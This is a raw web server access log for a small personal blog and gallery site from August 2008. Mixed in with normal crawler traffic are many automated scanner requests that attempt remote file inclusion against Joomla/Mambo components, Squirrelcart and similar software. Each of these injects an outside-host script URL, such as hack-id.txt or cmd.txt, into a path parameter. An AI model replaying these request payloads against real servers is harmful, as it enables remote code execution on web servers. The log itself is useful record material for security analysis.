67.195.37.99 - - [28/Aug/2008:11:34:29 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?show=gallery&pageid=159" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:30 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?show=gallery&pageid=163" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:34 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?show=gallery&pageid=163" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
213.33.84.163 - - [28/Aug/2008:11:34:37 -0700] "GET //index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 200 85403 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:34:38 -0700] "GET /logs/access_080224.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.33.84.163 - - [28/Aug/2008:11:34:38 -0700] "GET /logs//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:39 -0700] "GET /blog/index.php/2008/08/12/ HTTP/1.0" 200 68239 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:39 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/08/12/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:40 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/08/12/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:40 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/08/12/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:34:40 -0700] "GET /logs/access_080405.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:43 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/?show=gallery&pageid=159" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:34:50 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:34:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:34:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:34:52 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0171.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:34:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0110.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:59 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/?show=gallery&pageid=163" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:35:05 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:35:05 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0152.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
72.9.248.162 - - [28/Aug/2008:11:35:07 -0700] "GET /logs/!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:11:35:07 -0700] "GET /!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:35:09 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.158 - - [28/Aug/2008:11:35:10 -0700] "GET /?show=gallery&pageid=17 HTTP/1.0" 200 149658 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:35:10 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:35:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:35:11 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:35:11 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:35:14 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:35:17 -0700] "GET /logs/access_080503.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:35:24 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:35:31 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:11:35:42 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:35:42 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:11:35:42 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:11:35:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:35:50 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:35:50 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:36:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:36:10 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:36:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:36:10 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:36:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:36:11 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.0" 200 83337 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:36:11 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/category/motorcycles/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:36:12 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/category/motorcycles/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:36:12 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/category/motorcycles/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
72.9.248.162 - - [28/Aug/2008:11:36:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:36:29 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:36:35 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:36:36 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 200 85255 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:36:36 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:36:36 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:36:37 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 200 85255 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:36:38 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:36:51 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:36:54 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:37:08 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:37:13 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
219.83.122.149 - - [28/Aug/2008:11:37:19 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.83.122.149 - - [28/Aug/2008:11:37:20 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:37:23 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0127.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:37:25 -0700] "GET //?path%5Bdocroot%5D=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 85167 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [28/Aug/2008:11:37:28 -0700] "GET //index.php?option=com_custompages&cpage=http://trymallo.com/images/12-cmd.txt? HTTP/1.1" 200 85187 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [28/Aug/2008:11:37:29 -0700] "GET //index.php?option=com_custompages&cpage=http://trymallo.com/images/12-cmd.txt? HTTP/1.1" 200 85203 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:37:47 -0700] "GET /logs/access_080724.log//components/com_flyspray/startdown.php?file=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:11:38:18 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:38:24 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:38:25 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:38:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-146_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:38:56 -0700] "GET /logs/access_080225.log//squirrelcart/cart_content.php?cart_isp_root=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:38:56 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:38:56 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:39:04 -0700] "GET /header.php?tpl_pgb_moddir=http://primeraconchali.cl/modules/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:39:04 -0700] "GET /logs/access_080801.log/header.php?tpl_pgb_moddir=http://primeraconchali.cl/modules/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:39:05 -0700] "GET /logs/header.php?tpl_pgb_moddir=http://primeraconchali.cl/modules/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:39:08 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:39:09 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:39:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:39:35 -0700] "GET /logs/access_080229.log//squirrelcart/cart_content.php?cart_isp_root=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [28/Aug/2008:11:39:37 -0700] "GET /logs/access_080220.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [28/Aug/2008:11:39:37 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [28/Aug/2008:11:39:38 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.104 - - [28/Aug/2008:11:39:41 -0700] "GET /logs/access_080220.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.62.98 - - [28/Aug/2008:11:39:42 -0700] "GET /logs/access_080221.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:39:42 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.104 - - [28/Aug/2008:11:39:42 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.104 - - [28/Aug/2008:11:39:43 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:39:43 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:39:45 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:39:47 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:39:47 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.104 - - [28/Aug/2008:11:39:47 -0700] "GET /logs/access_080221.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:39:54 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:39:54 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:39:55 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:39:56 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:39:56 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.191.167.34 - - [28/Aug/2008:11:39:57 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:39:57 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.191.167.34 - - [28/Aug/2008:11:39:58 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 200 85247 "-" "libwww-perl/5.79" "www.dmulk.com"
91.191.167.34 - - [28/Aug/2008:11:39:59 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:40:00 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:40:00 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:40:02 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85231 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:40:02 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:40:03 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:40:03 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:40:04 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:40:04 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:40:04 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
